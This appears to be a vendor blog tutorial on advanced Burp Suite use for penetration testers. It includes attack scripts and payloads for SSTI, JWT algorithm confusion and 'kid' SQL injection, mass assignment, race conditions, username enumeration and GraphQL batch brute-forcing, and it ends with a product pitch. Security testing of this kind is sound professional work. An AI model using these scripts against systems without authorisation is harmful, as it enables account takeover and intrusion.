Burp Suite Mastery: Advanced Techniques for Professional Penetration Testers
Burp Suite is more than just a proxy and scanner. In the hands of an expert, it becomes a powerful platform for discovering vulnerabilities that automated tools miss. This guide covers advanced techniques used by professional penetration testers.
Setting Up for Advanced Testing
Optimized Configuration
# burp_project_options.json
{
"project_options": {
"connections": {
"platform_authentication": {
"use_platform_authentication": true,
"credentials": []
},
"socks_proxy": {
"use_socks_proxy": false
},
"timeouts": {
"normal": 120000,
"open_ended": 180000
}
},
"http": {
"redirections": {
"follow_redirections": "in_scope_only"
}
}
}
}
Memory Optimization
# Launch with optimized JVM settings
java -jar -Xms2g -Xmx8g \
-XX:+UseG1GC \
-XX:MaxGCPauseMillis=200 \
burpsuite_pro.jar
Advanced Proxy Techniques
Match and Replace Rules
Automatically modify requests/responses for testing:
# Remove security headers for testing
Type: Response header
Match: X-Frame-Options:.*
Replace: [empty]
Enabled: true
# Inject custom header
Type: Request header
Match: ^
Replace: X-Custom-Test: pentester
Enabled: true
# Downgrade TLS version indicator
Type: Request header
Match: Sec-Fetch-Mode: navigate
Replace: Sec-Fetch-Mode: cors
Enabled: true
Invisible Proxying
For thick clients and mobile apps that don't respect proxy settings:
# Redirect all traffic to Burp
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
# Configure Burp for invisible proxying
# Proxy > Options > Proxy Listeners > Request handling
# Support invisible proxying: checked
WebSocket Testing
# Custom WebSocket message handler
from burp import IBurpExtender, IProxyListener
class BurpExtender(IBurpExtender, IProxyListener):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
callbacks.registerProxyListener(self)
def processProxyMessage(self, messageIsRequest, message):
if message.getMessageInfo().getUrl().toString().contains("socket"):
# Analyze WebSocket upgrade and messages
self.analyzeWebSocket(message)
Intruder Mastery
Custom Payload Processing
Chain multiple payload processors for complex attacks:
Payload Processing Rules:
1. Hash: MD5
2. Encode: Base64
3. Add prefix: token=
4. Add suffix: &valid=true
Cluster Bomb for Multi-Parameter Attacks
Testing username enumeration with timing analysis:
Positions:
POST /login HTTP/1.1
Host: target.com
username=§admin§&password=§password123§
Payload Set 1 (usernames): admin, administrator, root, test
Payload Set 2 (passwords): password123
Attack Type: Cluster Bomb
Grep - Extract:
- Login failed
- Invalid username
- Account locked
Columns:
- Response time (for timing attacks)
- Response length (for enumeration)
Turbo Intruder for High-Speed Attacks
# turbo_intruder_race_condition.py
def queueRequests(target, wordlists):
engine = RequestEngine(
endpoint=target.endpoint,
concurrentConnections=50,
requestsPerConnection=100,
pipeline=True
)
# Race condition test - send requests simultaneously
for i in range(100):
engine.queue(target.req, gate='race1')
# Open the gate - all requests fire at once
engine.openGate('race1')
def handleResponse(req, interesting):
if '200' in req.response:
table.add(req)
Timing-Based Username Enumeration
# turbo_intruder_timing.py
import time
def queueRequests(target, wordlists):
engine = RequestEngine(
endpoint=target.endpoint,
concurrentConnections=1, # Single connection for accurate timing
requestsPerConnection=1,
pipeline=False
)
for username in open('/usr/share/seclists/Usernames/top-usernames-shortlist.txt'):
engine.queue(target.req, username.strip())
def handleResponse(req, interesting):
# Response time > 500ms might indicate valid username
# (bcrypt comparison takes longer for valid users)
table.add(req)
Scanner Customization
Custom Scan Checks
# custom_scan_check.py
from burp import IBurpExtender, IScannerCheck, IScanIssue
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerScannerCheck(self)
def doPassiveScan(self, baseRequestResponse):
issues = []
response = baseRequestResponse.getResponse()
analyzed = self._helpers.analyzeResponse(response)
# Check for sensitive data in response
body = response[analyzed.getBodyOffset():]
patterns = [
(b'api_key', 'API Key Exposure'),
(b'password', 'Password in Response'),
(b'BEGIN RSA PRIVATE KEY', 'Private Key Exposure'),
(b'eyJ', 'JWT Token in Response')
]
for pattern, issue_name in patterns:
if pattern in body:
issues.append(CustomScanIssue(
baseRequestResponse.getHttpService(),
self._helpers.analyzeRequest(baseRequestResponse).getUrl(),
[baseRequestResponse],
issue_name,
"Sensitive data found in response",
"High"
))
return issues
def doActiveScan(self, baseRequestResponse, insertionPoint):
# Custom active scanning logic
payloads = [
"{{7*7}}", # SSTI
"${7*7}", # Expression language
"{{constructor.constructor('return this')()}}" # Prototype pollution
]
issues = []
for payload in payloads:
checkRequest = insertionPoint.buildRequest(payload)
checkResponse = self._callbacks.makeHttpRequest(
baseRequestResponse.getHttpService(),
checkRequest
)
if b'49' in checkResponse.getResponse():
issues.append(self.createIssue(
baseRequestResponse,
"Server-Side Template Injection",
payload
))
return issues
Scan Configuration Profiles
{
"scanner": {
"audit_optimization": {
"scan_speed": "thorough",
"audit_accuracy": "minimize_false_negatives"
},
"issues_to_scan_for": {
"sql_injection": true,
"xss_reflected": true,
"xss_stored": true,
"command_injection": true,
"path_traversal": true,
"xxe": true,
"ssti": true,
"ssrf": true
},
"handling_application_errors": {
"handle_500_as_error": true,
"follow_redirections": "in_scope_only"
}
}
}
Essential Extensions
Must-Have Extensions
| Extension | Purpose |
|---|---|
| Logger++ | Advanced request/response logging |
| Autorize | Authorization testing |
| Param Miner | Hidden parameter discovery |
| Backslash Powered Scanner | Advanced injection detection |
| JSON Web Tokens | JWT analysis and attacks |
| Active Scan++ | Enhanced active scanning |
| Collaborator Everywhere | Out-of-band detection |
| Software Vulnerability Scanner | CVE detection |
Autorize Configuration
# Autorize Setup for Privilege Escalation Testing
1. Log in as low-privilege user
2. Configure Authorization Enforcement Status:
- Cookie: session=low_priv_session_token
- Header: Authorization: Bearer low_priv_jwt
3. Browse as admin user
4. Autorize replays with low-priv creds
# Detection Rules:
Enforced: Response matches low-priv response
Bypassed: Response matches admin response (VULNERABILITY!)
Param Miner Configuration
# Hidden Parameter Discovery
Target: https://target.com/api/users
# Wordlist sources:
- Built-in params
- Rails params
- Custom wordlist
# Techniques:
- Header injection
- URL parameters
- Body parameters
- JSON properties
# Example findings:
?debug=true → Exposes stack traces
?admin=1 → Elevates privileges
x-forwarded-for: 127.0.0.1 → Bypasses IP restrictions
Advanced Techniques
Hunting for Mass Assignment
# mass_assignment_scanner.py
from burp import IBurpExtender, IScannerCheck
import json
class BurpExtender(IBurpExtender, IScannerCheck):
def doActiveScan(self, baseRequestResponse, insertionPoint):
# Only test JSON body parameters
request = baseRequestResponse.getRequest()
if b'application/json' not in request:
return []
# Add potentially dangerous fields
dangerous_fields = [
'"isAdmin": true',
'"role": "admin"',
'"verified": true',
'"balance": 999999',
'"password": "hacked"'
]
issues = []
for field in dangerous_fields:
modified = self.injectJsonField(request, field)
response = self._callbacks.makeHttpRequest(
baseRequestResponse.getHttpService(),
modified
)
if self.detectMassAssignment(response):
issues.append(self.createIssue("Mass Assignment", field))
return issues
JWT Attack Automation
# jwt_attacks.py
import jwt
import base64
import json
def none_algorithm_attack(token):
"""CVE-2015-2951: Algorithm confusion"""
header, payload, _ = token.split('.')
header_decoded = json.loads(base64.b64decode(header + '=='))
header_decoded['alg'] = 'none'
new_header = base64.b64encode(json.dumps(header_decoded).encode()).decode().rstrip('=')
return f"{new_header}.{payload}."
def key_confusion_attack(token, public_key):
"""Use RSA public key as HMAC secret"""
header, payload, _ = token.split('.')
payload_decoded = json.loads(base64.b64decode(payload + '=='))
# Sign with public key as HMAC secret
return jwt.encode(payload_decoded, public_key, algorithm='HS256')
def kid_injection(token):
"""Key ID SQL injection"""
header, payload, _ = token.split('.')
header_decoded = json.loads(base64.b64decode(header + '=='))
header_decoded['kid'] = "' UNION SELECT 'secret' -- "
# ... continue attack
GraphQL Introspection & Attacks
# graphql_scanner.py
INTROSPECTION_QUERY = """
{
__schema {
types {
name
fields {
name
args { name type { name } }
}
}
mutationType { name fields { name } }
queryType { name fields { name } }
}
}
"""
BATCH_ATTACK = """
[
{"query": "mutation { login(user:\\"admin\\", pass:\\"a\\") { token } }"},
{"query": "mutation { login(user:\\"admin\\", pass:\\"b\\") { token } }"},
{"query": "mutation { login(user:\\"admin\\", pass:\\"c\\") { token } }"}
]
"""
# Bypasses rate limiting by batching requests
Workflow Automation
Macro-Based Authentication
# Configure macros for authenticated scanning
1. Project Options > Sessions > Macros > Add
Macro: "Login"
- Request 1: GET /login (get CSRF token)
- Request 2: POST /login (submit credentials)
- Request 3: GET /dashboard (verify session)
2. Session Handling Rules > Add
Rule: "Maintain Authentication"
- Scope: Target scope
- Actions:
- Check session is valid (dashboard returns 200)
- If invalid, run macro "Login"
- Update cookie jar
Automated CSRF Token Handling
Session Handling Rules:
1. Add Rule: "Update CSRF Token"
- Tools Scope: Scanner, Repeater, Intruder
- URL Scope: target.com
2. Rule Actions:
- Run macro: "Get CSRF Token"
- Extract: csrf_token from response
- Update parameter: _csrf in subsequent requests
Bambda Filters (Burp 2024)
// Filter for interesting responses
return requestResponse.response().bodyToString().contains("error")
&& requestResponse.response().statusCode() == 200;
// Filter for potential SQLi
return requestResponse.response().bodyToString().toLowerCase()
.matches(".*(sql|syntax|mysql|postgresql|oracle).*");
// Filter large responses
return requestResponse.response().body().length() > 10000;
Reporting Excellence
Custom Issue Definitions
<issues>
<issue>
<name>Insecure Direct Object Reference (IDOR)</name>
<severity>High</severity>
<confidence>Certain</confidence>
<background>
The application allows users to access resources belonging to other
users by manipulating predictable identifiers in the URL.
</background>
<remediation>
Implement proper authorization checks to verify the requesting user
has permission to access the requested resource.
</remediation>
</issue>
</issues>
Professional Report Generation
# report_generator.py
from burp import IBurpExtender, IContextMenuFactory
from javax.swing import JMenuItem
import json
class BurpExtender(IBurpExtender, IContextMenuFactory):
def createMenuItems(self, invocation):
return [JMenuItem("Generate Report", actionPerformed=self.generateReport)]
def generateReport(self, event):
issues = self._callbacks.getScanIssues("")
report = {
"executive_summary": self.createExecutiveSummary(issues),
"findings": [self.formatIssue(i) for i in issues],
"statistics": self.calculateStats(issues),
"remediation_roadmap": self.createRoadmap(issues)
}
# Export to PDF/HTML
Pro Tips from the Field
1. Response Comparison
Use Comparer to identify subtle differences:
- Compare admin vs user responses for authorization bypass
- Compare valid vs invalid input for error-based info disclosure
2. Search Operators
# Proxy History Search
response.body contains "password"
request.url matches ".*admin.*"
response.status_code = 500
response.length > 10000
3. Collaborator Client
# Check for blind vulnerabilities
1. Generate Collaborator payload: xyz123.burpcollaborator.net
2. Inject in headers: X-Forwarded-For: xyz123.burpcollaborator.net
3. Inject in parameters: url=http://xyz123.burpcollaborator.net
4. Poll for interactions: DNS, HTTP, SMTP
Integration with AIPTx
AIPTx enhances Burp Suite findings with:
- AI-Powered Analysis: Intelligent triage of Burp findings
- Automated Validation: Verify vulnerabilities without manual testing
- Correlation: Link Burp findings with other scanner results
- Reporting: Generate comprehensive reports from Burp data
Supercharge your Burp Suite workflow - Try AIPTx
